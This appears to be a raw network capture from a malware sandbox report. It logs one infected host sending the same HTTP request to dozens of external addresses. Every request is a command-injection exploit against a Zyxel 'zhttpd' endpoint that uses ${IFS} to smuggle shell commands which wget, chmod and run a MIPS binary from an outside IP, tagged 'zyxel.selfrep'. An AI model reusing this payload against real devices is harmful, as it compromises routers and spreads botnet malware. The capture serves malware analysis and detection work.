                                        Jan 14, 2024 16:18:56.761117935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7627192.168.2.1333270112.200.195.223443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.761192083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7628192.168.2.1357830199.108.40.8443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.761220932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7629192.168.2.135799432.126.220.72443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.761272907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7630192.168.2.1342280138.49.95.154443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.761327982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7631192.168.2.1356380178.40.161.221443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.761390924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7632192.168.2.135471262.160.238.249443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.761419058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7633192.168.2.1333762204.222.218.135443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.761464119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7634192.168.2.1344568152.192.31.170443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.761531115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7635192.168.2.1348500102.4.71.59443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.761564016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7636192.168.2.1334360114.10.159.126443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.761619091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7637192.168.2.1349226213.87.51.82443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.761668921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7638192.168.2.1349966184.126.169.17443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.761696100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7639192.168.2.1355190108.54.108.63443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.761773109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
                                        Jan 14, 2024 16:18:56.984915972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7640192.168.2.1355190166.34.242.201443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.761812925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7641192.168.2.135552476.196.243.42443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.761853933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7642192.168.2.1338172199.237.53.26443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.761930943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7643192.168.2.135212874.8.189.163443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.762007952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7644192.168.2.1355444117.210.95.122443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.762027025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7645192.168.2.1341314106.199.105.240443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.762079000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7646192.168.2.1351058218.65.113.30443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.762154102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7647192.168.2.1337492206.17.7.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.762211084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7648192.168.2.1350594133.208.143.189443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.762257099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7649192.168.2.1360184166.33.246.254443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.762324095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7650192.168.2.136085438.133.201.69443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.762388945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7651192.168.2.1354412100.33.231.118443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.762451887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7652192.168.2.134145427.185.199.199443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.762512922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7653192.168.2.133826036.64.238.151443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.762542963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7654192.168.2.1349872122.191.48.81443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.762593985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7655192.168.2.135774081.35.158.125443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.762667894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7656192.168.2.136065086.139.44.199443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.762727976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7657192.168.2.1356810210.67.189.206443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.762782097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7658192.168.2.13329609.0.32.238443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.762814999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7659192.168.2.1354182133.231.209.35443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.762902021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7660192.168.2.133644050.245.3.60443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.762959957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7661192.168.2.1353092196.234.52.53443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.763030052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7662192.168.2.1354740167.17.247.168443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.763106108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7663192.168.2.134320458.248.231.112443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.763144970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7664192.168.2.1352414105.50.181.119443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.763221979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7665192.168.2.1333404219.112.113.53443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.763273954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7666192.168.2.1334674180.131.74.111443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.763319016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7667192.168.2.134857434.213.146.8443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.763387918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7668192.168.2.1352510158.26.39.20443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.763459921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7669192.168.2.1352640117.26.215.224443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.763485909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7670192.168.2.134490692.70.169.81443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.763545990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7671192.168.2.134125645.218.162.38443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.763628006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7672192.168.2.135320219.240.167.96443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.763664007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7673192.168.2.1352282120.133.52.21443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.763715982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7674192.168.2.1345476181.63.182.134443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.763757944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7675192.168.2.1354698182.83.50.193443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.763820887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7676192.168.2.1334638175.109.75.127443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.763859987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7677192.168.2.1358992211.47.15.250443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.763916969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7678192.168.2.134024613.232.180.11443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.763998985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7679192.168.2.134875068.105.193.8443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.764028072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7680192.168.2.1334840160.18.237.119443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.764091969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7681192.168.2.1348176180.126.246.2443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.764132023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7682192.168.2.1354468109.160.84.241443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.764177084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7683192.168.2.1358402141.47.166.254443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.764213085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7684192.168.2.133819892.140.243.228443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.764265060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7685192.168.2.1356038174.228.64.190443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.764308929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7686192.168.2.134662883.36.107.153443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.764389992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7687192.168.2.1346178108.56.84.205443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:56.764427900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7688192.168.2.1353900102.38.130.250443
                                        TimestampBytes transferredDirectionData
